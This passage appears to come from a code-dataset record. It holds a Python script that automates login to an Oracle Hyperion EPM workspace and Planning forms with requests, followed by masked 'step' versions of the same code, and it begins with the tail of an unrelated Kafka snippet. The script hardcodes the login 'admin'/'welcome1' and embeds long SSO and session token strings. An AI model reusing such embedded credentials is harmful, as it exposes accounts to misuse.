logger.info('TRAP_produce started')\n run_kafka_producer_job(logs, 'test_log_security_proofpoint.trap_weekly')\n logger.info('TRAP_produce finished')\n else:\n logger.info(\"No logs for TRAP call.\")\n with open(minutes_before_file, 'w') as minutes_file:\n minutes_before = 0 if minutes_before < 0 else minutes_before\n minutes_file.write(str(minutes_before))",
"step-ids": [
4,
7,
8,
9,
11
]
}
|
[
4,
7,
8,
9,
11
] |
#! py -3
# -*- coding: utf-8 -*-
import requests
from urllib.parse import quote
import logging
from urllib.parse import urlparse
logger = logging.getLogger(__name__)
# NOTE(review): the line below immediately rebinds `logger` to the root
# logger, making the __name__-scoped logger above dead — confirm intent.
logger = logging.getLogger()
# Configure the log level. If not configured explicitly it defaults to
# WARNING, i.e. everything below WARNING is dropped and the attached
# handlers only receive records at or above this level — think of it as
# the master switch.
logger.setLevel(logging.INFO)
formatter = logging.Formatter(fmt="%(asctime)s %(filename)s[line:%(lineno)d]%(levelname)s - %(message)s",
                              datefmt="%m/%d/%Y %I:%M:%S %p")  # create the formatter object
console = logging.StreamHandler()  # send log output to the console
console.setLevel(logging.INFO)  # minimum level that reaches the console
console.setFormatter(formatter)  # apply the format
logger.addHandler(console)

# These settings will later move into a dedicated configuration file.
userAgent = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
# serverUrl = "http://192.168.60.125:19000/"
serverUrl = "http://epm.huaxinglu72hao.com/"
host = "epm.huaxinglu72hao.com"

# The shared session: it carries one set of headers and cookies, so
# updating them below (and in the helper functions) affects every
# subsequent request made through `s` — which is why those functions
# have no return value.
s = requests.Session()
s.headers.update({"User-Agent": userAgent})
s.headers.update({"Referer": serverUrl})
s.headers.update({"Host": host})
def workspaceLogon(account, password):
    """Log in to the EPM workspace and install the resulting tokens on
    the shared session.

    Side effects only: updates the module-level session headers with the
    assertion token, SSO token, CSRF token and DMS ECID scraped from the
    logon response.

    Raises:
        RuntimeError: when the HTTP request itself fails (chained to the
            underlying network error).
    """
    logger.info("logon: 开始模拟登录workspace")
    postUrl = "%sworkspace/logon" % serverUrl
    postData = {
        "sso_username": account,
        "sso_password": password,
    }
    try:
        responseRes = s.post(postUrl, data=postData)
    except Exception as e:
        logger.error(e)
        # Fix: chain the original exception so the network error is not lost.
        raise RuntimeError("登录失败: 网络异常, 请检查服务器地址配置") from e
    logger.info("登录返回: " + responseRes.text)
    # Whether or not the login succeeded, the status code is normally 200,
    # so the tokens must be scraped out of the response body instead.
    body = responseRes.text
    # NOTE(review): positional bracket parsing — assumes the SSO token is
    # always in the 3rd '[...]' group and the assertion token in the 7th;
    # an IndexError here means the logon response format changed.
    sso_token = body.split('[')[2].split(']')[0]
    assertertoken = body.split('[')[6].split(']')[0]
    updateHeaders({"ora_epm_ctg": assertertoken})
    updateHeaders({"_sso_token": sso_token})
    updateHeaders({"X-ORACLE-BPMUI-CSRF": responseRes.headers.get("X-ORACLE-BPMUI-CSRF")})
    updateHeaders({"X-ORACLE-DMS-ECID": responseRes.headers.get("X-ORACLE-DMS-ECID")})
def updateHeaders(h):
    # Merge *h* into the shared session's headers so every subsequent
    # request through `s` carries them (mutates module state; returns None).
    logger.info(f"更新请求头: {h}")
    s.headers.update(h)
def request_dyn():
    """Fire a test request at the raframework `dyn` endpoint and log the
    response headers (smoke test; no return value).

    Relies on workspaceLogon() having stored `_sso_token` in the shared
    session headers.
    """
    logger.info("dyn: 开始测试请求")
    target = serverUrl + "/raframework/browse/dyn"
    payload = {
        "page": "/conf/CDSConfig.jsp",
        "amp": "",
        "action": "returnXML",
        "LOCALE_LANGUAGE": "en_US",
        "rightToLeft": "false",
        "accessibilityMode": "false",
        "themeSelection": "Skyros",
        "sso_token": s.headers.get("_sso_token"),
    }
    reply = s.post(target, data=payload)
    # logger.info(f"dyn: 响应text:{reply.text}")
    logger.info(f"dyn: 响应header:{reply.headers}")
def request_planning_session(plan_name):
    """Open a Planning session for *plan_name* via Adf.jsp and prime the
    cookies the planning UI expects.

    The form fields replay a captured browser request (fixed viewport
    sizes, cluster/instance ids); the repository and SSO tokens are taken
    from the live session state rather than the captured values.
    """
    logger.info("planning_session: 开始测试请求")
    target = "%s/HyperionPlanning/modules/com/hyperion/planning/Adf.jsp" % serverUrl
    form = {
        "accessibilityMode": "false",
        "bpm.contentheight": "621",
        "bpm.contentwidth": "1314",
        "bpm.objectpaletteheight": "648",
        "bpm.objectpalettewidth": "207",
        "cluster": "PLANNING_LWA",
        "instance": "7",
        "LOCALE_LANGUAGE": "zh_CN",
        "mru_id": f"PLANNING_LWA_{plan_name}:application",
        "repository_token": s.cookies.get("ORA_EPMWS_session"),
        "rightToLeft": "false",
        "sourceApp": plan_name,
        "sso_token": s.headers.get("_sso_token"),
        "themeSelection": "Skyros",
    }
    reply = s.post(target, data=form)
    # logger.info(f"dyn: 响应text:{reply.text}")
    logger.info(f"planning_session: 响应cookie:{reply.cookies}")
    # Manually install the two MRU cookies the planning UI normally sets.
    s.cookies.set("ORA_HP_MRUApplication", plan_name,
                  path="/HyperionPlanning/", domain=host)
    s.cookies.set("ORA_HP_MRUUsername", s.cookies.get("ORA_EPMWS_User"),
                  path="/HyperionPlanning/", domain=host)
    logger.info("当前的header为: " + str(s.headers))
    logger.info("当前的cookie为: " + str(s.cookies))
    # logger.info(f"planning_session: 响应:{reply.text}")
# Access one specific form
import re
def request_planning_table():
# 下面的数据都是写死的, 只适用于JSTI->A0000主要指标表
s.headers["Adf-Ads-Page-Id"] = "2"
s.headers["Adf-Rich-Message"] = "true"
url = serverUrl + "/HyperionPlanning/faces/PlanningCentral?_adf.ctrl-state=9gxaes0ha_55?_adf.ctrl-state="
response = s.post(url + "14hssan6gi_4",
data="p:r:0:pc1:searchName=&org.apache.myfaces.trinidad.faces.FORM=f1&javax.faces.ViewState=!-9xx6pbfv3&oracle.adf.view.rich.DELTAS=%7Bp%3Ar%3A0%3Apc1%3AformTbl%3D%7BviewportSize%3D27%2Crows%3D33%2CscrollTopRowKey%7Cp%3D0%7D%2Cp%3AformTbl%3D%7BselectedRowKeys%3D0%7D%7D&event=p%3AloadBtn&event.p:loadBtn=%3Cm+xmlns%3D%22http%3A%2F%2Foracle.com%2FrichClient%2Fcomm%22%3E%3Ck+v%3D%22_custom%22%3E%3Cb%3E1%3C%2Fb%3E%3C%2Fk%3E%3Ck+v%3D%22module%22%3E%3Cs%3Eenterdata%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22folderId%22%3E%3Cs%3E%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22formId%22%3E%3Cn%3E55532%3C%2Fn%3E%3C%2Fk%3E%3Ck+v%3D%22searchFormName%22%3E%3Cs%3EA0000%E4%B8%BB%E8%A6%81%E6%8C%87%E6%A0%87%E8%A1%A8%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22adhocSessionIdForForm%22%3E%3Cs%3E%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22artifactType%22%3E%3Cs%3E%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22tlArtifactType%22%2F%3E%3Ck+v%3D%22tlArtifactId%22%2F%3E%3Ck+v%3D%22immediate%22%3E%3Cb%3E1%3C%2Fb%3E%3C%2Fk%3E%3Ck+v%3D%22type%22%3E%3Cs%3EloadModule%3C%2Fs%3E%3C%2Fk%3E%3C%2Fm%3E&oracle.adf.view.rich.PROCESS=p%3AloadBtn")
# 从输出的结果看被重定向了
logger.info(response.content)
# m = re.search(r"_adf\.ctrl-state=.+?&", response.text)
# current = m.group(0).split("=")[1].replace("&", "")
#
# response = s.post(url + current,
# data="p:r:0:pc1:searchName=&org.apache.myfaces.trinidad.faces.FORM=f1&javax.faces.ViewState=!-9xx6pbfv3&oracle.adf.view.rich.DELTAS=%7Bp%3Ar%3A0%3Apc1%3AformTbl%3D%7BviewportSize%3D27%2Crows%3D33%2CscrollTopRowKey%7Cp%3D0%7D%2Cp%3AformTbl%3D%7BselectedRowKeys%3D0%7D%7D&event=p%3AloadBtn&event.p:loadBtn=%3Cm+xmlns%3D%22http%3A%2F%2Foracle.com%2FrichClient%2Fcomm%22%3E%3Ck+v%3D%22_custom%22%3E%3Cb%3E1%3C%2Fb%3E%3C%2Fk%3E%3Ck+v%3D%22module%22%3E%3Cs%3Eenterdata%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22folderId%22%3E%3Cs%3E%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22formId%22%3E%3Cn%3E55532%3C%2Fn%3E%3C%2Fk%3E%3Ck+v%3D%22searchFormName%22%3E%3Cs%3EA0000%E4%B8%BB%E8%A6%81%E6%8C%87%E6%A0%87%E8%A1%A8%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22adhocSessionIdForForm%22%3E%3Cs%3E%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22artifactType%22%3E%3Cs%3E%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22tlArtifactType%22%2F%3E%3Ck+v%3D%22tlArtifactId%22%2F%3E%3Ck+v%3D%22immediate%22%3E%3Cb%3E1%3C%2Fb%3E%3C%2Fk%3E%3Ck+v%3D%22type%22%3E%3Cs%3EloadModule%3C%2Fs%3E%3C%2Fk%3E%3C%2Fm%3E&oracle.adf.view.rich.PROCESS=p%3AloadBtn")
#
# logger.info(response.content)
if __name__ == "__main__":
# 从返回结果来看,有登录成功
workspaceLogon("admin", "welcome1")
request_dyn()
request_planning_session("JSTI")
request_planning_table()
# logger.info("sso_token = %s" % sso_token)
# logger.info("sso_token = %s" % sso_token)
# logger.info("assertertoken = %s" % assertertoken)
# request_dyn(sso_token,assertertoken)
# requestHSS("tYy6FOvH4ZhJR1CUTy83Q9ZJxiNnYbnAt8fjWcMBII4rEmQlYjth+/M4MLIXVuXp7Hi3xQS4+QRySoxvNuFibcGbxbIYRVLFVKogwyhtIAcvtIXMvfhxd8svcLZgIXyTklurCsTarP9KtRgc26B3XRWlDG/QAzVLWyGH26ROffQpUj+bW6yRrj7A0udq1PbqGFXjDZ9iNW0ALbg0Z5NC7g3pBgjtetBohXRmpV32DCw4tI1Y7j7tLnHtSFk/NtdNri5AAFCTqTPd6HYdBzbCDqfP7ZEdfeXJFsfatRE5Pcgqm36hV1U7HeDENhTvNBtZiiQ9OfMdopyHQQvPnBQsyfKzSKTq1O5bSHH9HzQfCJdvq/nkSbalctY2SxIb0vtefJ9fUZ2y4bMAm/g95EZLiKZ5aouVrzOKjt8sl1zVctk+Ivg141wUPqtTULOYdBoi")
|
normal
|
{
"blob_id": "c5d92ec592250d5bc896d32941364b92ff1d21e9",
"index": 3793,
"step-1": "<mask token>\n\n\ndef request_dyn():\n logger.info('dyn: 开始测试请求')\n postUrl = '%s/raframework/browse/dyn' % serverUrl\n postData = {'page': '/conf/CDSConfig.jsp', 'amp': '', 'action':\n 'returnXML', 'LOCALE_LANGUAGE': 'en_US', 'rightToLeft': 'false',\n 'accessibilityMode': 'false', 'themeSelection': 'Skyros',\n 'sso_token': s.headers.get('_sso_token')}\n responseRes = s.post(postUrl, data=postData)\n logger.info(f'dyn: 响应header:{responseRes.headers}')\n\n\ndef request_planning_session(plan_name):\n \"\"\"\n \"accessibilityMode\":\t\"false\",\n \"bpm.contentheight\":\t\"621\",\n \"bpm.contentwidth\":\t\"1314\",\n \"bpm.objectpaletteheight\":\t\"648\",\n \"bpm.objectpalettewidth\":\t\"207\",\n \"cluster\":\t\"PLANNING_LWA\",\n \"instance\":\t\"7\",\n \"LOCALE_LANGUAGE\":\t\"zh_CN\",\n \"mru_id\":\t\"PLANNING_LWA_JSTI1:application\",\n \"repository_token\":\t\"59d9b714b22a35fb616dd3c05c5850d56b12522a9561499e9ea22afd918b6d36ea703f19668538504f86305c84f95441a1daf4cac09725703738d5073524871af0489411df16d2bb8f5d4726acdcc389b45e9e6ff00482249c53c1886ca68bfc090fcfbd365243996436f5bbe3affd9c87f6d5e8b7626e59adaeebcc4a89a66ef9725d8d4218c8b0c15912455a2690fcd2391a71806767f05fe66b395dda3e74b75ffa16e80c7814c47657dbc5d652da1044edc74ff20d6e604bdd733542457c3befca52c0700d758445b00ad519d0e8dee43e40cb78e070caca6b7c7a56008b2cbad75e83c7c8454f93177992f9166721331db1e11e48a113a51b3ebc2a79f1d74199127183d7708c47a3ff71663d9d\",\n \"rightToLeft\":\t\"false\",\n \"sourceApp\":\t\"JSTI1\",\n \"sso_token\":\t\"sJIsuVcoOMtHD5CgUaVLmuo4SfCatQy4dowOxaTF0cj1CDqPrPW8YYKvn4nU5rsBYG1yLUChBU/ndO+3pDhwFcRbHJZmaiUOnyFhEh97A5xDXatOpkhIPx4CW+ygHNQlmKrbgUZEmJBgwNT4lcBuDPCZiodPZBo3zCkrSMLQcq0R8qoX6nHvfSVW3ep86WHDyJ859v9OCxcbo4FD4tSv4fTdHGdkGtQaRpdMtuSGtvY2hB+Z7MPEHqkhkIVAt0WWVplND5rUdF5yrLVsywYLWq7I2GH3/UVnwSgsmQy/psjChbnHkzqAcxNg837XRFI1EZBVxaGvdJw6U2mu3qlD29oYi2C/UqwODIjXGtj/st29j6fvd3lJHpsneutkVoG0E/mohFU+JzQaCnopeA+L3A8pORvkfwSyqhURqiLLHS0=\",\n \"themeSelection\":\t\"Skyros\",\n\n\n \"\"\"\n 
logger.info('planning_session: 开始测试请求')\n postUrl = ('%s/HyperionPlanning/modules/com/hyperion/planning/Adf.jsp' %\n serverUrl)\n postData = {'accessibilityMode': 'false', 'bpm.contentheight': '621',\n 'bpm.contentwidth': '1314', 'bpm.objectpaletteheight': '648',\n 'bpm.objectpalettewidth': '207', 'cluster': 'PLANNING_LWA',\n 'instance': '7', 'LOCALE_LANGUAGE': 'zh_CN', 'mru_id':\n f'PLANNING_LWA_{plan_name}:application', 'repository_token': s.\n cookies.get('ORA_EPMWS_session'), 'rightToLeft': 'false',\n 'sourceApp': plan_name, 'sso_token': s.headers.get('_sso_token'),\n 'themeSelection': 'Skyros'}\n responseRes = s.post(postUrl, data=postData)\n logger.info(f'planning_session: 响应cookie:{responseRes.cookies}')\n s.cookies.set('ORA_HP_MRUApplication', plan_name, path=\n '/HyperionPlanning/', domain=host)\n s.cookies.set('ORA_HP_MRUUsername', s.cookies.get('ORA_EPMWS_User'),\n path='/HyperionPlanning/', domain=host)\n logger.info('当前的header为: ' + str(s.headers))\n logger.info('当前的cookie为: ' + str(s.cookies))\n\n\n<mask token>\n\n\ndef request_planning_table():\n s.headers['Adf-Ads-Page-Id'] = '2'\n s.headers['Adf-Rich-Message'] = 'true'\n url = (serverUrl +\n '/HyperionPlanning/faces/PlanningCentral?_adf.ctrl-state=9gxaes0ha_55?_adf.ctrl-state='\n )\n response = s.post(url + '14hssan6gi_4', data=\n 
'p:r:0:pc1:searchName=&org.apache.myfaces.trinidad.faces.FORM=f1&javax.faces.ViewState=!-9xx6pbfv3&oracle.adf.view.rich.DELTAS=%7Bp%3Ar%3A0%3Apc1%3AformTbl%3D%7BviewportSize%3D27%2Crows%3D33%2CscrollTopRowKey%7Cp%3D0%7D%2Cp%3AformTbl%3D%7BselectedRowKeys%3D0%7D%7D&event=p%3AloadBtn&event.p:loadBtn=%3Cm+xmlns%3D%22http%3A%2F%2Foracle.com%2FrichClient%2Fcomm%22%3E%3Ck+v%3D%22_custom%22%3E%3Cb%3E1%3C%2Fb%3E%3C%2Fk%3E%3Ck+v%3D%22module%22%3E%3Cs%3Eenterdata%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22folderId%22%3E%3Cs%3E%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22formId%22%3E%3Cn%3E55532%3C%2Fn%3E%3C%2Fk%3E%3Ck+v%3D%22searchFormName%22%3E%3Cs%3EA0000%E4%B8%BB%E8%A6%81%E6%8C%87%E6%A0%87%E8%A1%A8%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22adhocSessionIdForForm%22%3E%3Cs%3E%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22artifactType%22%3E%3Cs%3E%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22tlArtifactType%22%2F%3E%3Ck+v%3D%22tlArtifactId%22%2F%3E%3Ck+v%3D%22immediate%22%3E%3Cb%3E1%3C%2Fb%3E%3C%2Fk%3E%3Ck+v%3D%22type%22%3E%3Cs%3EloadModule%3C%2Fs%3E%3C%2Fk%3E%3C%2Fm%3E&oracle.adf.view.rich.PROCESS=p%3AloadBtn'\n )\n logger.info(response.content)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef workspaceLogon(account, password):\n logger.info('logon: 开始模拟登录workspace')\n postUrl = '%sworkspace/logon' % serverUrl\n postData = {'sso_username': account, 'sso_password': password}\n try:\n responseRes = s.post(postUrl, data=postData)\n except Exception as e:\n logger.error(e)\n raise RuntimeError('登录失败: 网络异常, 请检查服务器地址配置')\n logger.info('登录返回: ' + responseRes.text)\n sso_token = responseRes.text.split('[')[2].split(']')[0]\n assertertoken = responseRes.text.split('[')[6].split(']')[0]\n assertertoken_ = {'ora_epm_ctg': assertertoken}\n updateHeaders(assertertoken_)\n token = {'_sso_token': sso_token}\n updateHeaders(token)\n CSRF = responseRes.headers.get('X-ORACLE-BPMUI-CSRF')\n csrf_ = {'X-ORACLE-BPMUI-CSRF': CSRF}\n updateHeaders(csrf_)\n ECID = responseRes.headers.get('X-ORACLE-DMS-ECID')\n h = {'X-ORACLE-DMS-ECID': ECID}\n updateHeaders(h)\n\n\ndef updateHeaders(h):\n logger.info(f'更新请求头: {h}')\n s.headers.update(h)\n\n\ndef request_dyn():\n logger.info('dyn: 开始测试请求')\n postUrl = '%s/raframework/browse/dyn' % serverUrl\n postData = {'page': '/conf/CDSConfig.jsp', 'amp': '', 'action':\n 'returnXML', 'LOCALE_LANGUAGE': 'en_US', 'rightToLeft': 'false',\n 'accessibilityMode': 'false', 'themeSelection': 'Skyros',\n 'sso_token': s.headers.get('_sso_token')}\n responseRes = s.post(postUrl, data=postData)\n logger.info(f'dyn: 响应header:{responseRes.headers}')\n\n\ndef request_planning_session(plan_name):\n \"\"\"\n \"accessibilityMode\":\t\"false\",\n \"bpm.contentheight\":\t\"621\",\n \"bpm.contentwidth\":\t\"1314\",\n \"bpm.objectpaletteheight\":\t\"648\",\n \"bpm.objectpalettewidth\":\t\"207\",\n \"cluster\":\t\"PLANNING_LWA\",\n \"instance\":\t\"7\",\n \"LOCALE_LANGUAGE\":\t\"zh_CN\",\n \"mru_id\":\t\"PLANNING_LWA_JSTI1:application\",\n 
\"repository_token\":\t\"59d9b714b22a35fb616dd3c05c5850d56b12522a9561499e9ea22afd918b6d36ea703f19668538504f86305c84f95441a1daf4cac09725703738d5073524871af0489411df16d2bb8f5d4726acdcc389b45e9e6ff00482249c53c1886ca68bfc090fcfbd365243996436f5bbe3affd9c87f6d5e8b7626e59adaeebcc4a89a66ef9725d8d4218c8b0c15912455a2690fcd2391a71806767f05fe66b395dda3e74b75ffa16e80c7814c47657dbc5d652da1044edc74ff20d6e604bdd733542457c3befca52c0700d758445b00ad519d0e8dee43e40cb78e070caca6b7c7a56008b2cbad75e83c7c8454f93177992f9166721331db1e11e48a113a51b3ebc2a79f1d74199127183d7708c47a3ff71663d9d\",\n \"rightToLeft\":\t\"false\",\n \"sourceApp\":\t\"JSTI1\",\n \"sso_token\":\t\"sJIsuVcoOMtHD5CgUaVLmuo4SfCatQy4dowOxaTF0cj1CDqPrPW8YYKvn4nU5rsBYG1yLUChBU/ndO+3pDhwFcRbHJZmaiUOnyFhEh97A5xDXatOpkhIPx4CW+ygHNQlmKrbgUZEmJBgwNT4lcBuDPCZiodPZBo3zCkrSMLQcq0R8qoX6nHvfSVW3ep86WHDyJ859v9OCxcbo4FD4tSv4fTdHGdkGtQaRpdMtuSGtvY2hB+Z7MPEHqkhkIVAt0WWVplND5rUdF5yrLVsywYLWq7I2GH3/UVnwSgsmQy/psjChbnHkzqAcxNg837XRFI1EZBVxaGvdJw6U2mu3qlD29oYi2C/UqwODIjXGtj/st29j6fvd3lJHpsneutkVoG0E/mohFU+JzQaCnopeA+L3A8pORvkfwSyqhURqiLLHS0=\",\n \"themeSelection\":\t\"Skyros\",\n\n\n \"\"\"\n logger.info('planning_session: 开始测试请求')\n postUrl = ('%s/HyperionPlanning/modules/com/hyperion/planning/Adf.jsp' %\n serverUrl)\n postData = {'accessibilityMode': 'false', 'bpm.contentheight': '621',\n 'bpm.contentwidth': '1314', 'bpm.objectpaletteheight': '648',\n 'bpm.objectpalettewidth': '207', 'cluster': 'PLANNING_LWA',\n 'instance': '7', 'LOCALE_LANGUAGE': 'zh_CN', 'mru_id':\n f'PLANNING_LWA_{plan_name}:application', 'repository_token': s.\n cookies.get('ORA_EPMWS_session'), 'rightToLeft': 'false',\n 'sourceApp': plan_name, 'sso_token': s.headers.get('_sso_token'),\n 'themeSelection': 'Skyros'}\n responseRes = s.post(postUrl, data=postData)\n logger.info(f'planning_session: 响应cookie:{responseRes.cookies}')\n s.cookies.set('ORA_HP_MRUApplication', plan_name, path=\n '/HyperionPlanning/', domain=host)\n s.cookies.set('ORA_HP_MRUUsername', 
s.cookies.get('ORA_EPMWS_User'),\n path='/HyperionPlanning/', domain=host)\n logger.info('当前的header为: ' + str(s.headers))\n logger.info('当前的cookie为: ' + str(s.cookies))\n\n\n<mask token>\n\n\ndef request_planning_table():\n s.headers['Adf-Ads-Page-Id'] = '2'\n s.headers['Adf-Rich-Message'] = 'true'\n url = (serverUrl +\n '/HyperionPlanning/faces/PlanningCentral?_adf.ctrl-state=9gxaes0ha_55?_adf.ctrl-state='\n )\n response = s.post(url + '14hssan6gi_4', data=\n 'p:r:0:pc1:searchName=&org.apache.myfaces.trinidad.faces.FORM=f1&javax.faces.ViewState=!-9xx6pbfv3&oracle.adf.view.rich.DELTAS=%7Bp%3Ar%3A0%3Apc1%3AformTbl%3D%7BviewportSize%3D27%2Crows%3D33%2CscrollTopRowKey%7Cp%3D0%7D%2Cp%3AformTbl%3D%7BselectedRowKeys%3D0%7D%7D&event=p%3AloadBtn&event.p:loadBtn=%3Cm+xmlns%3D%22http%3A%2F%2Foracle.com%2FrichClient%2Fcomm%22%3E%3Ck+v%3D%22_custom%22%3E%3Cb%3E1%3C%2Fb%3E%3C%2Fk%3E%3Ck+v%3D%22module%22%3E%3Cs%3Eenterdata%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22folderId%22%3E%3Cs%3E%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22formId%22%3E%3Cn%3E55532%3C%2Fn%3E%3C%2Fk%3E%3Ck+v%3D%22searchFormName%22%3E%3Cs%3EA0000%E4%B8%BB%E8%A6%81%E6%8C%87%E6%A0%87%E8%A1%A8%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22adhocSessionIdForForm%22%3E%3Cs%3E%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22artifactType%22%3E%3Cs%3E%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22tlArtifactType%22%2F%3E%3Ck+v%3D%22tlArtifactId%22%2F%3E%3Ck+v%3D%22immediate%22%3E%3Cb%3E1%3C%2Fb%3E%3C%2Fk%3E%3Ck+v%3D%22type%22%3E%3Cs%3EloadModule%3C%2Fs%3E%3C%2Fk%3E%3C%2Fm%3E&oracle.adf.view.rich.PROCESS=p%3AloadBtn'\n )\n logger.info(response.content)\n\n\n<mask token>\n",
"step-3": "<mask token>\nlogger.setLevel(logging.INFO)\n<mask token>\nconsole.setLevel(logging.INFO)\nconsole.setFormatter(formatter)\nlogger.addHandler(console)\n<mask token>\ns.headers.update({'User-Agent': userAgent})\ns.headers.update({'Referer': serverUrl})\ns.headers.update({'Host': host})\n\n\ndef workspaceLogon(account, password):\n logger.info('logon: 开始模拟登录workspace')\n postUrl = '%sworkspace/logon' % serverUrl\n postData = {'sso_username': account, 'sso_password': password}\n try:\n responseRes = s.post(postUrl, data=postData)\n except Exception as e:\n logger.error(e)\n raise RuntimeError('登录失败: 网络异常, 请检查服务器地址配置')\n logger.info('登录返回: ' + responseRes.text)\n sso_token = responseRes.text.split('[')[2].split(']')[0]\n assertertoken = responseRes.text.split('[')[6].split(']')[0]\n assertertoken_ = {'ora_epm_ctg': assertertoken}\n updateHeaders(assertertoken_)\n token = {'_sso_token': sso_token}\n updateHeaders(token)\n CSRF = responseRes.headers.get('X-ORACLE-BPMUI-CSRF')\n csrf_ = {'X-ORACLE-BPMUI-CSRF': CSRF}\n updateHeaders(csrf_)\n ECID = responseRes.headers.get('X-ORACLE-DMS-ECID')\n h = {'X-ORACLE-DMS-ECID': ECID}\n updateHeaders(h)\n\n\ndef updateHeaders(h):\n logger.info(f'更新请求头: {h}')\n s.headers.update(h)\n\n\ndef request_dyn():\n logger.info('dyn: 开始测试请求')\n postUrl = '%s/raframework/browse/dyn' % serverUrl\n postData = {'page': '/conf/CDSConfig.jsp', 'amp': '', 'action':\n 'returnXML', 'LOCALE_LANGUAGE': 'en_US', 'rightToLeft': 'false',\n 'accessibilityMode': 'false', 'themeSelection': 'Skyros',\n 'sso_token': s.headers.get('_sso_token')}\n responseRes = s.post(postUrl, data=postData)\n logger.info(f'dyn: 响应header:{responseRes.headers}')\n\n\ndef request_planning_session(plan_name):\n \"\"\"\n \"accessibilityMode\":\t\"false\",\n \"bpm.contentheight\":\t\"621\",\n \"bpm.contentwidth\":\t\"1314\",\n \"bpm.objectpaletteheight\":\t\"648\",\n \"bpm.objectpalettewidth\":\t\"207\",\n \"cluster\":\t\"PLANNING_LWA\",\n \"instance\":\t\"7\",\n 
\"LOCALE_LANGUAGE\":\t\"zh_CN\",\n \"mru_id\":\t\"PLANNING_LWA_JSTI1:application\",\n \"repository_token\":\t\"59d9b714b22a35fb616dd3c05c5850d56b12522a9561499e9ea22afd918b6d36ea703f19668538504f86305c84f95441a1daf4cac09725703738d5073524871af0489411df16d2bb8f5d4726acdcc389b45e9e6ff00482249c53c1886ca68bfc090fcfbd365243996436f5bbe3affd9c87f6d5e8b7626e59adaeebcc4a89a66ef9725d8d4218c8b0c15912455a2690fcd2391a71806767f05fe66b395dda3e74b75ffa16e80c7814c47657dbc5d652da1044edc74ff20d6e604bdd733542457c3befca52c0700d758445b00ad519d0e8dee43e40cb78e070caca6b7c7a56008b2cbad75e83c7c8454f93177992f9166721331db1e11e48a113a51b3ebc2a79f1d74199127183d7708c47a3ff71663d9d\",\n \"rightToLeft\":\t\"false\",\n \"sourceApp\":\t\"JSTI1\",\n \"sso_token\":\t\"sJIsuVcoOMtHD5CgUaVLmuo4SfCatQy4dowOxaTF0cj1CDqPrPW8YYKvn4nU5rsBYG1yLUChBU/ndO+3pDhwFcRbHJZmaiUOnyFhEh97A5xDXatOpkhIPx4CW+ygHNQlmKrbgUZEmJBgwNT4lcBuDPCZiodPZBo3zCkrSMLQcq0R8qoX6nHvfSVW3ep86WHDyJ859v9OCxcbo4FD4tSv4fTdHGdkGtQaRpdMtuSGtvY2hB+Z7MPEHqkhkIVAt0WWVplND5rUdF5yrLVsywYLWq7I2GH3/UVnwSgsmQy/psjChbnHkzqAcxNg837XRFI1EZBVxaGvdJw6U2mu3qlD29oYi2C/UqwODIjXGtj/st29j6fvd3lJHpsneutkVoG0E/mohFU+JzQaCnopeA+L3A8pORvkfwSyqhURqiLLHS0=\",\n \"themeSelection\":\t\"Skyros\",\n\n\n \"\"\"\n logger.info('planning_session: 开始测试请求')\n postUrl = ('%s/HyperionPlanning/modules/com/hyperion/planning/Adf.jsp' %\n serverUrl)\n postData = {'accessibilityMode': 'false', 'bpm.contentheight': '621',\n 'bpm.contentwidth': '1314', 'bpm.objectpaletteheight': '648',\n 'bpm.objectpalettewidth': '207', 'cluster': 'PLANNING_LWA',\n 'instance': '7', 'LOCALE_LANGUAGE': 'zh_CN', 'mru_id':\n f'PLANNING_LWA_{plan_name}:application', 'repository_token': s.\n cookies.get('ORA_EPMWS_session'), 'rightToLeft': 'false',\n 'sourceApp': plan_name, 'sso_token': s.headers.get('_sso_token'),\n 'themeSelection': 'Skyros'}\n responseRes = s.post(postUrl, data=postData)\n logger.info(f'planning_session: 响应cookie:{responseRes.cookies}')\n s.cookies.set('ORA_HP_MRUApplication', plan_name, 
path=\n '/HyperionPlanning/', domain=host)\n s.cookies.set('ORA_HP_MRUUsername', s.cookies.get('ORA_EPMWS_User'),\n path='/HyperionPlanning/', domain=host)\n logger.info('当前的header为: ' + str(s.headers))\n logger.info('当前的cookie为: ' + str(s.cookies))\n\n\n<mask token>\n\n\ndef request_planning_table():\n s.headers['Adf-Ads-Page-Id'] = '2'\n s.headers['Adf-Rich-Message'] = 'true'\n url = (serverUrl +\n '/HyperionPlanning/faces/PlanningCentral?_adf.ctrl-state=9gxaes0ha_55?_adf.ctrl-state='\n )\n response = s.post(url + '14hssan6gi_4', data=\n 